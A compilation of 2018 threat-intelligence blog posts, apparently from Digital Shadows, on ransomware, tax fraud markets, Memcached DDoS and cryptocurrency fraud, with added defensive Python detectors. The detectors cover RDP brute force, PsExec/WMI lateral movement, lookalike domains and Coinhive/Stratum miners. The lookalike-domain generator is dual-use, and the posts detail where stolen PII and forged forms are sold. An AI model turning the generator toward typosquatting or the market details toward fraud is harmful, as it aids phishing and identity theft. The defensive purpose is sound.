Researchers at the University of Ohio, in the United States, released PoC code for a vulnerability dubbed SgxPectre, a claimed variation of the “Spectre” vulnerability. SgxPectre enables unauthorized access to sensitive data protected by Intel’s Software Guard eXtensions (SGX). The vulnerability affects runtime libraries, meaning any program using SGX is potentially vulnerable. Release of any PoC code has previously encouraged threat actors to attempt exploitation of vulnerabilities, but in this case no such attempts have yet been detected. It is not known which types of information can be accessed by exploiting this vulnerability, or how easy it is to exploit.


Historical compromise of German government now linked to Turla

Attackers infected 17 computers in the German Federal Foreign Office with an undisclosed malware variant. The malware exfiltrated data and received commands using Microsoft Outlook. The intrusion, first reported 28 February 2018, affected the Foreign Office from March 2017 to December 2017. Attribution was initially made to the threat group “APT-28” (aka Fancy Bear), but journalists later cited the threat group “Turla”. The attack was said to be part of a wider campaign affecting multiple geographies and was likely conducted by a well-resourced group.



Ransomware in 2018: 4 Things to Look Out For Thu, 08 Mar 2018 23:59:00 +0000 Ransomware remains an active threat for organizations into 2018. Last year, large scale attacks like NotPetya and WCry wreaked havoc, shutting systems and costing millions of dollars in recovery. To develop effective mitigation strategies, we need to closely analyze the ever-evolving ransomware landscape. In particular, we expect developments in four broad areas, namely: ransomware delivery mechanisms, lateral movement tools, service models, and payment mechanisms.

Ransomware Developments in 2018

 1. Delivery mechanisms

Ransomware can be delivered by multiple vectors. To limit the need for initial user interaction, threat actors are using exposed internet-facing infrastructure, like Remote Desktop Protocol (RDP), as an entry vector. This is partly due to availability: RDP credentials and brute forcing tools are easily purchasable on criminal forums. However, there are also tactical and operational reasons: RDP gives interactive access to the machine, meaning that threat actors can identify specific areas of valuable data or even move laterally across networks.


Figure 1: RDP brute forcing tool advertised for $4.25 on criminal marketplace

Other remote entry vectors that ransomware operators can target include Internet Information Services (IIS) or JBoss application servers.

 2. Self-propagation

Self-propagation mechanisms leverage the damaging impact of a single endpoint infection. Companies with locked down external networks may have flat internal networks, producing conditions for ransomware to self-propagate. Self-propagation is becoming popular among ransomware operators because:

  • Tools like PsExec and the Windows Management Instrumentation Command-line (WMIC) can be driven from batch script files to automate lateral movement within networks
  • Vulnerability exploits are available, for example SMB exploit “EternalBlue” used during WCry
  • Malicious groups can demand larger extortion amounts with multiple infections, or produce a highly damaging attack like NotPetya
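The two precursors described above, RDP brute forcing against an exposed host and lateral movement via PsExec or WMI, both leave traces in Windows event logs that a defender can alert on before encryption starts. The following is an added example, not code from the original post or from Digital Shadows: it runs simple detection logic over a handful of constructed sample events written in a simplified "timestamp key=value" layout of our own (the field names mirror the Windows Security and System log fields, but the format, the addresses and the timestamps are invented). It flags a source IP with five or more failed RemoteInteractive logons (Event ID 4625, LogonType 10) inside 60 seconds, notes whether a successful logon (4624) from the same source followed, and reports a PSEXESVC service installation (Event ID 7045) and a process spawned by WmiPrvSE.exe (Event ID 4688), the usual artefacts of the two lateral-movement tools named above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log extracts). Layout: ISO timestamp followed by key=value pairs.
SAMPLE_EVENTS = r"""
2018-03-08T10:00:01Z EventID=4625 LogonType=10 IpAddress=203.0.113.5 TargetUserName=administrator
2018-03-08T10:00:06Z EventID=4625 LogonType=10 IpAddress=203.0.113.5 TargetUserName=administrator
2018-03-08T10:00:11Z EventID=4625 LogonType=10 IpAddress=203.0.113.5 TargetUserName=admin
2018-03-08T10:00:16Z EventID=4625 LogonType=10 IpAddress=203.0.113.5 TargetUserName=admin
2018-03-08T10:00:21Z EventID=4625 LogonType=10 IpAddress=203.0.113.5 TargetUserName=backup
2018-03-08T10:00:26Z EventID=4625 LogonType=10 IpAddress=203.0.113.5 TargetUserName=backup
2018-03-08T10:00:40Z EventID=4624 LogonType=10 IpAddress=203.0.113.5 TargetUserName=backup
2018-03-08T10:05:00Z EventID=4625 LogonType=10 IpAddress=198.51.100.7 TargetUserName=jsmith
2018-03-08T10:07:12Z EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\PSEXESVC.exe
2018-03-08T10:07:30Z EventID=4688 NewProcessName=C:\Windows\System32\cmd.exe ParentProcessName=C:\Windows\System32\wbem\WmiPrvSE.exe
"""


def parse_events(text):
    """Parse the simplified event format into dicts; 'ts' becomes a datetime."""
    events = []
    for line in text.strip().splitlines():
        ts, _, rest = line.partition(" ")
        fields = dict(kv.split("=", 1) for kv in rest.split())
        fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(fields)
    return events


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold RemoteInteractive (LogonType 10) failures within one window.

    A later 4624 from the same source is recorded separately: a burst of failures followed by a
    success is the case that needs immediate triage.
    """
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e.get("LogonType") != "10":
            continue
        if e["EventID"] == "4625":
            failures[e["IpAddress"]].append(e["ts"])
        elif e["EventID"] == "4624":
            successes[e["IpAddress"]].append(e["ts"])
    alerts = []
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted failure times
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "ip": ip,
                    "failures": end - start + 1,
                    "first": times[start],
                    "last": t,
                    "success_after": any(s >= t for s in successes.get(ip, [])),
                })
                break                            # one alert per source is enough for a queue
    return alerts


def detect_lateral_movement(events):
    """Report PsExec service installs (7045) and processes spawned by the WMI provider host (4688)."""
    findings = []
    for e in events:
        if e["EventID"] == "7045":
            svc = (e.get("ServiceName", "") + " " + e.get("ImagePath", "")).upper()
            if "PSEXESVC" in svc:
                findings.append({"type": "psexec_service_install", "ts": e["ts"]})
        elif e["EventID"] == "4688":
            parent = e.get("ParentProcessName", "").lower()
            if parent.endswith("wmiprvse.exe"):
                findings.append({"type": "wmi_spawned_process", "ts": e["ts"],
                                 "child": e.get("NewProcessName")})
    return findings


def analyze(text):
    """Run both detectors over the event text and return their results."""
    events = parse_events(text)
    return {"bruteforce": detect_rdp_bruteforce(events),
            "lateral": detect_lateral_movement(events)}


if __name__ == "__main__":
    for key, items in analyze(SAMPLE_EVENTS).items():
        print(key, items)
```

On the sample, the burst from 203.0.113.5 is flagged with `success_after` set, while the single failure from 198.51.100.7 stays below threshold; a real deployment would feed the parser from a SIEM or Windows Event Forwarding rather than from an inline string, and would tune `threshold` and `window` to the environment's normal RDP failure rate.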

 3. Ransomware as a service (RaaS)

Ransomware as a service (RaaS) models give threat actors without skills or resources the ability to deliver ransomware. Like other as a service models, users can sign up to platforms that provide backend infrastructure to manage operations. While RaaS is not new, the continued emergence of new variants shows the service remains in active development, and that a market still exists for it. This service model opens the ransomware marketplace to a wider variety of threat actors, while still remaining profitable for developers as they generally receive a percentage of each infection.

 4. Payment mechanisms

Ransomware variants deployed in financially motivated attacks live and die by profit generation. Payment mechanisms are currently an area of weakness for ransomware developers, as they are not often automated or scalable. Ransomware operators tend to rely on email or Tor sites with cryptocurrency payments, which likely reduces operational effectiveness. Some variants have fully automated payment infrastructure, from infection to payment and delivery of decryption keys; however, these are relatively limited. Large, self-propagating attacks to date have had poorly implemented payment infrastructure – as seen with the WCry attack, which only had three Bitcoin wallets to receive payment due to a bug in the malware’s code.


Building your Ransomware Playbook

Establishing a ransomware playbook can help preparation for an eventual attack. The playbook can be used to define specific roles and functions should the unwanted occur, allowing organizations to establish tactics for managing a ransomware infection, as well as strategies for dealing with the aftermath. An effective ransomware playbook:

  • Requires a whole-of-business approach to planning. Ransomware affects multiple business areas and may result in large scale service disruption
  • Plans responses to extortion demands and identifies “worst case” scenarios
  • Shows an understanding of your playing field and adversaries. Threat intelligence can help to inform approaches to ransomware attacks

For more insight into the ransomware ecosystem, join our live webinar on “Emerging Ransomware Threats and How to Protect Your Data” being held on 15 March 2018. Hear from Digital Shadows’ analysts and the FBI Cyber Division’s leading ransomware investigator about the latest threats and vectors, as well as best practices for protecting you and your organization.

Pressing For Progress This International Women’s Day Thu, 08 Mar 2018 06:27:19 +0000 “Do you think you’re going to be able to handle working with all these men?”

One of the few questions over the course of my career that momentarily stunned me during the interview process, this happened over 20 years ago when I was interviewing for a more technical role in my current company at that time. I say stunned because the question had never occurred to me and this is in spite of growing up during a time when I knew I could be an astronaut (thank you Sally Ride!), but had resigned myself to the fact that “girls can’t be President”.  It sounds ridiculous now to type it, but these were the facts of my life growing up in the southern part of the US, in a very conservative, church-going family and long before the Internet was a thing.

As I ponder our upcoming International Women’s Day and think about the path my own life has taken, I am truly both in awe of how far we’ve come and simultaneously, how far we have yet to go. It has only been in the last few years that I’ve realized a lot of my behaviors have been influenced by unconscious bias, from my parents, teachers, friends, peers and colleagues so I am encouraged to see the dialogue continuing today through the various movements around the world.  

This year’s IWD theme is “Time is Now: Rural and urban activists transforming women’s lives”. I have long looked up to the many amazing and inspiring activists who tackle these challenges on a daily basis. I also think many others are hesitant to call themselves “activist” for fear of reprisal or challenge and I throw my own hat into that ring – I’ve never thought of myself as an activist, despite leading my university’s chapter of N.O.W., marching in “Take back the night” rallies and turning down opportunities for IT employment that had “females must wear dresses” requirements (yes, this really happened). What I’ve learned over the years is that it is less important about what you call yourself – just as our actions shape our destiny, so too do they describe our aspirations and capabilities. For all my male and female friends and colleagues who are nervous about taking up the title activist or feminist, I challenge you to simply “do”. Call out the derogatory jokes when you hear them, challenge your peers to leave discrimination behind them, and turn an eye to your own unconscious bias.

Lastly, in light of the recent RSA keynote conversation and ongoing challenges around having enough women in the cyber security industry, if I could turn the clock back and tell my younger self anything, it would be to build the technical capability, competency and confidence that goes along with that, but also to be open to taking leaps of faith. It took me a long time to realize I could apply for the next challenge or next role without being 110% qualified.

As for that interview question?  My response: “I hope they can handle working with me!” I’m happy to report I got the job.


Interested in reading more on Women in Security? Read my colleague’s blog post, Women in Security: Where We Are And Where We Need To Go.

It’s Accrual World: Tax Return Fraud in 2018 Wed, 07 Mar 2018 17:15:17 +0000 With just over a month until Tax Deadline Day, individuals are scrambling to get their tax returns submitted. This is a proven time of the year for cybercrime, and 2018 has been no exception. The Internal Revenue Service has already outlined new scams targeting consumers this year. Criminals have once again used tax themes as lures to spread malware, as was the case with the Rapid Ransomware campaign.

Tax Fraud in 2018

Tax fraud endures despite countermeasures and increased awareness of the threat. This is largely due to the extent of personally identifiable information (PII) available online. Social Security Numbers (SSNs) are widely advertised and can be purchased for as little as $1; Figure 1 shows a criminal site selling 4,210,341 SSNs, which also include associated names, physical addresses and dates of birth.

Figure 1: Social Security Numbers for sale on cvv[.]me


The Equifax breach in 2017 led to the theft of PII belonging to at least 145 million individuals. Recent revelations suggest that attackers may have also stolen tax identification numbers, additional driver’s license and credit card details. While it is not clear whether the breach was conducted by cybercriminals or a nation-state, this data – should it eventually find its way into the criminal market – would provide a wealth of opportunities for tax fraudsters.

Acquiring Tax Information

Tax information – such as W2, 1040 and 1099 forms, as well as company accounts – is valuable data for cybercriminals. This information can be obtained through network intrusions, phishing, and Business Email Compromise. The latter technique typically works by impersonating an employee within the organization. In this tax version of the scam, the victim is asked to transfer tax documents instead of wiring funds. With this data, criminals can then commit fraud or resell the data.

Attackers can also acquire this information through scampages. Tax filing companies are particular targets of these phishing attempts. A recent example of this is turbotax-myintuit[.]com, an imitation of the legitimate turbotax[.]intuit[.]com. While the site is not yet hosting content, it has the potential to be used in phishing campaigns.

At this time of year, fraudsters take to forums requesting help with getting tax information for their scams; meanwhile, more technically capable actors look to profit by providing their services and expertise. In Figure 2, a criminal forum user asks for help in obtaining the relevant documents needed to submit their fraudulent tax return, while in Figure 3 a seller openly advertises their “Hacking Services”, which includes the ability to procure W2 forms.

Figure 2: User on Hack Forums looking to buy W2 and 1040 tax forms (screenshot taken on February 27, 2018)


Figure 3: Seller on Offensive Community forum advertising hacking services


Purchasing Information Online

For as little as $40-50, criminals can bypass these procedures altogether and buy these documents on criminal forums and marketplaces. These include stolen, pre-filled and forged forms (Figure 4), as well as specialist guides for conducting tax return fraud (Figure 5).

Figure 4: Forged W2 form advertised for $52 on Dream Market


Figure 5: Tax return fraud cashout guide for sale on Wall Street marketplace


Social Security Numbers are ubiquitous across dark and deep web marketplaces and criminal shops. In some instances, as seen in Figures 6 and 7, vendors will offer packages that have a range of data on individuals. This can be partial PII or “fullz”, a term that means a combination of financial and personal information. The latter is more valuable for threat actors, but partial PII can also be used to commit a range of identity frauds, including falsified tax returns.

Figure 6: W2 and SSN information for sale on Wall Street, a darkweb marketplace


Figure 7: “Full profiles” advertised on Dream Market, a dark web marketplace. The posting includes W2 forms, pay-stubs and Social Security Numbers


Of course, there are security measures that make tax fraud more difficult for criminals, such as the IP PIN that is issued to many taxpayers by the IRS. Despite the IRS being vulnerable to compromise in previous years, the system is now more resilient to exposing that information to fraudsters (there is no longer a web interface for forgotten PINs with easy-to-answer questions, for example).

Capitalizing on Dediks

Fraudsters can target the accounts of tax filing companies without the need for phishing or scam pages. In Figure 8, one forum user seeks partners who control computers with tax preparation software installed. The term “Dedik” is an abbreviation of “dedicated”, used to describe a computer under the remote control of a hacker. With control of users’ computers that have this software, malicious actors can capture keystrokes and ultimately gain access to the user accounts.

Figure 8: Actor on a Russian-speaking forum seeking individuals with access to computers that have tax preparation software present (screenshot taken on February 27, 2018)


Staying Safe Online

With actors looking to monetize the vast amount of PII available online during tax season, consumers, organizations and tax filing companies should be extra-vigilant about fraudulent activity. Here are some tips:

  1. Consumers who have been the victim of identity theft should submit an Identity Theft Affidavit.
  2. The IRS provides some great resources for understanding the latest techniques used by attackers, available on its website or by following @irstaxpros on Twitter.
  3. Organizations should consider that BEC can be used to obtain information as well as to wire funds. Update your security awareness training content to include the BEC scenario. This should be included in new hire training, but you should also conduct ad hoc training for this scenario now.
  4. Tax filing companies should monitor for spoofed domains. DNS Twist is a good, free resource to do so.
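Tip 4 and the turbotax-myintuit[.]com case above both come down to the same monitoring task: generate the lookalikes of your own domain that tools like DNS Twist enumerate, and classify every newly observed domain (from certificate transparency feeds, newly registered domain lists or abuse reports) against that list. The following is an added example, not code from the original post, from Digital Shadows or from the DNS Twist project: it builds a small set of permutations (omission, repetition, transposition, digit homoglyphs, hyphenation, phishing keywords and subdomain flattening) for a protected hostname and classifies observed domains as legitimate, typosquat, brand-in-label or unrelated. The protected hostname is the page's own turbotax.intuit.com; the other observed domains are constructed for the demonstration, and the registrable-domain helper assumes a single-label TLD such as .com rather than consulting a public suffix list.

```python
# Digit substitutions fraudsters commonly use; extend with Unicode confusables for IDN monitoring.
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "t": "7", "b": "8", "g": "9"}
# Words frequently glued to a brand name in phishing domains.
PHISH_KEYWORDS = ("login", "secure", "my", "support", "account", "verify")


def registrable(domain):
    """Return the last two labels (assumption: single-label TLD; no public suffix list is used)."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_candidates(domain):
    """Generate a DNS-Twist-style set of lookalike domains for the registrable part of `domain`."""
    name, _, tld = registrable(domain).partition(".")
    cands = set()
    for i in range(len(name)):
        cands.add(name[:i] + name[i + 1:])                            # omission
        cands.add(name[:i + 1] + name[i] + name[i + 1:])              # repetition
        if name[i] in HOMOGLYPHS:
            cands.add(name[:i] + HOMOGLYPHS[name[i]] + name[i + 1:])  # homoglyph
        if i:
            cands.add(name[:i] + "-" + name[i:])                      # hyphenation
        if i < len(name) - 1:
            cands.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])  # transposition
    for kw in PHISH_KEYWORDS:
        cands.update({f"{name}-{kw}", f"{kw}-{name}", f"{kw}{name}", f"{name}{kw}"})
    labels = domain.lower().split(".")[:-1]
    if len(labels) > 1:
        # Subdomain flattening: turbotax.intuit.com -> turbotax-intuit.com / turbotaxintuit.com
        cands.add("-".join(labels))
        cands.add("".join(labels))
    cands.discard(name)
    return {f"{c}.{tld}" for c in cands if c}


def classify(observed, protected):
    """Classify an observed domain relative to the protected hostname."""
    observed = observed.lower().strip(".")
    reg = registrable(protected)
    if observed == reg or observed.endswith("." + reg):
        return "legitimate"
    if observed in lookalike_candidates(protected):
        return "typosquat"
    obs_name = registrable(observed).partition(".")[0]
    # Brand token embedded in a longer label (the turbotax-myintuit pattern): flag for review.
    for token in protected.lower().split(".")[:-1]:
        if len(token) >= 5 and token in obs_name:
            return "brand_in_label"
    return "unrelated"


if __name__ == "__main__":
    protected = "turbotax.intuit.com"
    # Constructed observations for the demonstration.
    for d in ("turbotax.intuit.com", "turbotax-myintuit.com", "intiut.com", "1ntuit.com", "example.com"):
        print(f"{d:28} {classify(d, protected)}")
```

In practice the candidate set is resolved on a schedule (new A/MX records on a candidate are the signal), and the `brand_in_label` class catches the many registrations that no fixed permutation list would predict; both classes are review queues, not automatic takedown triggers.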


Shadow Talk Update – 03.05.2018 Mon, 05 Mar 2018 16:23:17 +0000 On this week’s Shadow Talk podcast, the Research Team cover CVE-2018-4878 being used in a spam campaign, the HTTPS certificate chaos between Trustico and DigiCert, more ransomware reporting on the SamSam and DataKeeper variants, and the threat of large-scale distributed denial of service (DDoS) attacks using Memcached servers.

Spam enables Flash vulnerability exploit

An Adobe Flash vulnerability tracked as CVE-2018-4878 is being exploited through a spam email campaign. Lure emails contained a shortened link that, if clicked, accessed a Web domain hosting weaponized Microsoft Word documents. If documents were opened, the attack attempted to exploit the vulnerability, enabling remote code execution. CVE-2018-4878 was previously exploited as a zero-day vulnerability in targeted espionage; the spam campaign shows its rapid uptake by other threat actors. Proof of concept exploit code was released publicly, meaning CVE-2018-4878 will likely continue to be targeted by operations using multiple entry vectors, despite a patch being available.


Thousands of website certificates revoked after private key exposure

23,000 Symantec-issued HTTPS website certificates resold by Trustico will be revoked after associated private keys were exposed via email. This may result in website service interruptions unless owners quickly replace certificates. Affected customers were notified, with both DigiCert – the entity responsible for revoking the certificates – and Trustico offering free replacement certs. Although both DigiCert and Trustico are likely to suffer some reputational damage due to conflicting reporting and their public dispute, this is unlikely to impact trust in the certification system.


Update on SamSam ransomware attack

The Colorado Department of Transportation, in the United States, took 2,000-plus staff computers offline after an attack by ransomware “SamSam”. No crucial systems were reportedly affected, and only computers running Windows operating systems were disrupted. The attack vector is not known, but SamSam usually targets vulnerable software applications or servers. The “Gold Lowell” threat group has previously used SamSam and accrued a significant profit from attacks.


New DataKeeper ransomware variant detected

The “DataKeeper” ransomware-as-a-service (RaaS) variant is distinct for its ability to conduct lateral movement. At the time of publication, there had been no transactions into the Bitcoin address associated with this RaaS, indicating that any attempted extortions using the address were ineffective. However, given its accessibility, profit share and capacity for lateral movement, this ransomware will likely be adopted by a variety of actors.


Memcached servers used for DDoS reflection attacks

There is a new DDoS reflection attack method that uses Memcached internet-facing servers. Memcached is a memory caching system that, by default, “listens” on UDP port 11211. More than 90,000 of these servers were discovered on Internet of Things search engine, Shodan, as of 28 February. The code repository site GitHub was targeted by this method, with the peak attack volume recorded at 1.35 terabits per second. Blocking, filtering or modifying Memcached configuration to only listen on localhost is recommended.
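The two Memcached items on this page (the record-breaking attacks and the recommendation to filter or bind to localhost) give a defender two concrete checks. The following is an added example, not code from the original post or from Digital Shadows: the first function audits a memcached command line for the two settings that turn a server into a reflector, using memcached's `-U` (UDP port, `0` disables UDP) and `-l` (bind address) flags and taking the default stated above, UDP on 11211 when `-U` is absent; the second runs over constructed flow records (an invented five-field summary, not a real NetFlow export) and flags server/client pairs where the bytes leaving UDP port 11211 dwarf the bytes that arrived, which is what a reflection attack looks like from the reflector's own network. Addresses, ports and byte counts are constructed.

```python
import argparse
from dataclasses import dataclass


def audit_memcached_cmdline(cmdline):
    """Audit a memcached command line for reflector-enabling settings.

    Assumes memcached's -U/-l flags and the default described on the page: UDP enabled on 11211
    when -U is absent. Unknown flags (-m, -p, -u, ...) are ignored via parse_known_args.
    """
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("-U", type=int, default=11211)       # UDP port; 0 disables UDP
    parser.add_argument("-l", default="0.0.0.0")             # bind address; default is all interfaces
    opts, _unknown = parser.parse_known_args(cmdline.split()[1:])
    all_interfaces = opts.l in ("0.0.0.0", "::")
    findings = []
    if opts.U != 0:
        findings.append(f"UDP enabled on port {opts.U}; use -U 0 unless UDP is required")
    if all_interfaces:
        findings.append(f"bound to all interfaces ({opts.l}); use -l 127.0.0.1 or a private address")
    return {"udp_port": opts.U, "bind": opts.l, "findings": findings,
            "reflector_risk": opts.U != 0 and all_interfaces}


@dataclass
class Flow:
    """Constructed flow summary (one direction of a conversation)."""
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    packets: int
    bytes: int


def detect_memcached_reflection(flows, min_amplification=10.0):
    """Flag (server, client) pairs whose UDP/11211 response volume exceeds the request volume
    by min_amplification. Requests with a spoofed source yield a very high ratio because the
    'client' never sent anything substantial."""
    requests, responses = {}, {}
    for f in flows:
        if f.proto != "udp":
            continue
        if f.dst_port == 11211:
            key = (f.dst_ip, f.src_ip)
            requests[key] = requests.get(key, 0) + f.bytes
        if f.src_port == 11211:
            key = (f.src_ip, f.dst_ip)
            responses[key] = responses.get(key, 0) + f.bytes
    alerts = []
    for (server, client), out_bytes in responses.items():
        in_bytes = requests.get((server, client), 0)
        ratio = out_bytes / in_bytes if in_bytes else float("inf")
        if ratio >= min_amplification:
            alerts.append({"server": server, "victim": client,
                           "bytes_out": out_bytes, "bytes_in": in_bytes, "ratio": round(ratio, 1)})
    return sorted(alerts, key=lambda a: -a["ratio"])


# Constructed flows: 203.0.113.10 is the spoofed victim, 192.0.2.5 a normal client.
SAMPLE_FLOWS = [
    Flow("udp", "203.0.113.10", 40001, "198.51.100.20", 11211, 3, 180),
    Flow("udp", "198.51.100.20", 11211, "203.0.113.10", 40001, 100, 140000),
    Flow("udp", "192.0.2.5", 50000, "198.51.100.20", 11211, 1, 100),
    Flow("udp", "198.51.100.20", 11211, "192.0.2.5", 50000, 1, 300),
    Flow("tcp", "192.0.2.6", 50010, "198.51.100.20", 11211, 10, 2000),
]

if __name__ == "__main__":
    print(audit_memcached_cmdline("memcached -m 64 -p 11211 -u memcache"))
    print(audit_memcached_cmdline("memcached -m 64 -p 11211 -U 0 -l 127.0.0.1 -u memcache"))
    print(detect_memcached_reflection(SAMPLE_FLOWS))
```

The command-line audit can be run over the output of a process listing on each cache host; the flow check is the complementary network-side control, and a high-ratio hit on a host that the audit says is bound to all interfaces is the server to fix first.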



The New Frontier: Forecasting Cryptocurrency Fraud Thu, 01 Mar 2018 16:34:51 +0000 Not a week goes by without a new case of cryptocurrency fraud making headlines. The most recent example concerned the BitGrail exchange, which suffered an attack that resulted in the loss of 17 million Nano Tokens ($170 million). Although BitGrail responded by announcing new security measures – highlighting the need for better security practices by both companies and individuals handling cryptocurrencies – this incident has also been marred by a disagreement between Nano Token and BitGrail over liability. This has sharpened calls for strict regulation of cryptocurrencies and their methods of exchange.

Regulation could have a significant impact on the cryptocurrency space, but we need to remember that even with long-established regulatory and law enforcement measures, traditional currencies are still targeted by fraudsters, so we shouldn’t expect cryptocurrencies to be any different.

What we can be sure of is that cybercriminals will continue to find new ways of making money as long as there are enough suitable targets available and the financial reward justifies their time and effort. To better model the future of cryptocurrency fraud, it helps to outline the main drivers and assumptions behind this phenomenon, which we have achieved by using the Cone of Plausibility analytical technique (see Figure 1 below). Our recent paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud, provides an analysis of these drivers. These include:

  1. Accessibility – Advances in technology and the wide availability of tools facilitate this type of fraud. Products such as Crypto Jacker lower the barrier to entry, as explored in our previous blog.
  2. Anonymity – Cryptocurrencies and blockchain technology offer a level of anonymity that, while beneficial in many respects, also emboldens fraudsters. Currencies like Monero have better privacy features relative to their older cryptocurrency counterparts, which has in part made it increasingly popular on criminal markets and in money laundering operations. The funds accrued during the June 2017 WannaCry attack, for example, were converted from Bitcoin to Monero, likely because this move would make it easier to anonymously convert into fiat currency.
  3. Popularity and hype – The boom in cryptocurrency investment and development in recent years is one of the strongest drivers for this type of fraud. Criminals will always follow the money, looking to take advantage of whatever is most popular and most lucrative. In the mid-nineteenth century, the promise of gold inspired hundreds of thousands of people to make the journey to California in the hope of striking it rich. The cryptocurrency boom can be seen as a new Gold Rush, with countless individuals rushing to get a piece of the action, heartened by the astronomical rise of Bitcoin, which reached $19,343 in mid-December 2017.
  4. Reputation – Once seen as an esoteric countercultural development favoured by libertarians or criminals, the integration of cryptocurrencies into existing payment systems has given them greater legitimacy. Although not widespread, the roll-out of cryptocurrency-backed prepaid cards and plans for private European banks to provide cryptocurrency services increases the reputation of cryptocurrencies – in turn making them a more attractive prospect to investors. If their reputation increases, they will become more popular, increasing the number of targets for fraudsters.
  5. Opportunity – The sheer number of new altcoins, exchanges and coin offerings means that fraudsters have a wealth of potential targets. With over 1,442 cryptocurrencies in circulation, and new alternative coins – “altcoins” – emerging every week, the opportunities for cybercriminals to defraud cryptocurrency enthusiasts only increase. Our previous blog focused on the ways criminals were exploiting the interest in Initial Coin Offerings (ICOs) – a way of crowdfunding cryptocurrencies and platforms – through exit scams, spoof ICOs and price manipulation.
  6. Regulation – The success of price manipulation and scam ICOs is aided by a lack of regulation and oversight. In a regulated market such fraud would be illegal, and the threat of law enforcement action would probably deter many, although not all, criminals. Moreover, exchanges and ICO projects would be under more pressure to improve their security practices as they would face serious consequences for facilitating a breach. The BitGrail case, discussed above, is a clear example where a lack of clarity over who bears responsibility for the attack has meant customers have so far been prevented from reclaiming the value of their tokens.
     Despite more concerted efforts of late by U.S. authorities – the Securities and Exchange Commission recently filed charges against PlexCorps, which was accused of defrauding investors through a scam ICO – the future of cryptocurrency regulation is also uncertain and should not be seen as a panacea for fraud. Criminals will continue to take risks regardless of the potential legal ramifications of being caught. In addition, regulatory implementation will likely be uneven, with some countries such as China and South Korea choosing to ban ICOs completely. While stricter regulation could have a beneficial effect in reducing fraud, it may also deter would-be investors and drive down the value of cryptocurrencies.
  7. Security – As long as organizations and individuals fail to improve their security measures, opportunities for fraud will continue to exist. Weak password practices enable account takeovers, misconfigured cloud services facilitate cryptojacking, and failure to patch and update effectively means attackers can continue to exploit known vulnerabilities to deliver cryptomining malware.



Figure 1: Cone of Plausibility used to forecast future of cryptocurrencies

One of the greatest benefits of this forecasting approach is that it allows us to clearly outline the drivers behind the rise in cryptocurrency fraud, which in turn allows us to home in on the factors that we as organizations and individuals can influence. While some changes will be harder and more time-consuming to implement, there are several measures that organizations, consumers and exchanges can immediately take to mitigate cryptocurrency fraud risks. These include:


  • Authenticating cloud services like AWS to stop fraudsters from stealing your processing power to mine
  • Replacing factory-default credentials with unique and strong passwords to prevent Internet of Things devices from being incorporated into botnets
  • Enforcing strong password security rules across your organizations – this includes enabling multi-factor authentication (MFA)
  • Patching known vulnerabilities being used to deliver crypto miners. Vulnerabilities in Apache Struts (CVE-2017-5638) and DotNetNuke (CVE-2017-9822) servers have been used to download Monero miners. These miners have also been delivered by exploiting patched vulnerabilities in the popular Apache CouchDB open source database (CVE-2017-12635 and CVE-2017-12636)
  • Having a reputable adblocker in place: the NoCoin browser extension was also developed to block coin miners like Coinhive
  • Checking phishing databases and more specialist cryptocurrency fraud sites such as the Ethereum Scam Database before using any sites that you are unfamiliar with
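Blocking in-browser miners (the NoCoin bullet) and spotting cryptomining malware delivered through the vulnerabilities listed above are both detection problems with simple, high-confidence indicators: a page that loads the Coinhive library and instantiates its `CoinHive.Anonymous`/`CoinHive.User` API, and an endpoint that speaks the Stratum mining protocol (JSON-RPC methods `mining.subscribe`, `mining.authorize`, `mining.submit`, or the Monero pool variant whose `login` call carries `login`/`pass`/`agent` parameters) to an outside host. The following is an added example, not code from the original post, from Digital Shadows or from the NoCoin project: it scans a constructed HTML page for miner script indicators and runs constructed proxy log lines (an invented "timestamp src -> dst:port body" layout) through a Stratum detector. All addresses, hosts and the site key are constructed placeholders.

```python
import json
import re

# Indicators of in-browser mining libraries; the Coinhive names are the ones the page discusses.
MINER_SCRIPT_PATTERNS = {
    "coinhive_script": re.compile(r"coinhive\.min\.js", re.I),
    "coinhive_api": re.compile(r"\bCoinHive\.(Anonymous|User)\b"),
    "cryptonight_wasm": re.compile(r"cryptonight[\w-]*\.wasm", re.I),
}

# Stratum v1 JSON-RPC methods used by Bitcoin-style pools.
STRATUM_V1_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit"}

# Constructed proxy log line format: "<ts> <src_ip> -> <dst_host>:<port> <request body>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>[^:\s]+):(?P<port>\d+) (?P<body>.*)$")


def scan_html(html):
    """Return the names of miner indicators present in a page body."""
    return sorted(name for name, pat in MINER_SCRIPT_PATTERNS.items() if pat.search(html))


def classify_stratum(body):
    """Return 'stratum_v1', 'stratum_monero' or None for one request body."""
    try:
        msg = json.loads(body)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    method, params = msg.get("method"), msg.get("params")
    if method in STRATUM_V1_METHODS:
        return "stratum_v1"
    # Monero pools: {"method":"login","params":{"login":<wallet>,"pass":...,"agent":...}}
    if method == "login" and isinstance(params, dict) and {"login", "pass"} <= params.keys():
        return "stratum_monero"
    return None


def scan_proxy_log(lines):
    """Flag log lines whose body is a Stratum handshake or share submission."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_stratum(m["body"])
        if kind:
            alerts.append({"ts": m["ts"], "src": m["src"], "dst": m["dst"],
                           "port": int(m["port"]), "kind": kind})
    return alerts


# Constructed sample page: the Coinhive embed pattern with a placeholder site key.
SAMPLE_HTML = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();</script>
</head><body>Welcome</body></html>"""

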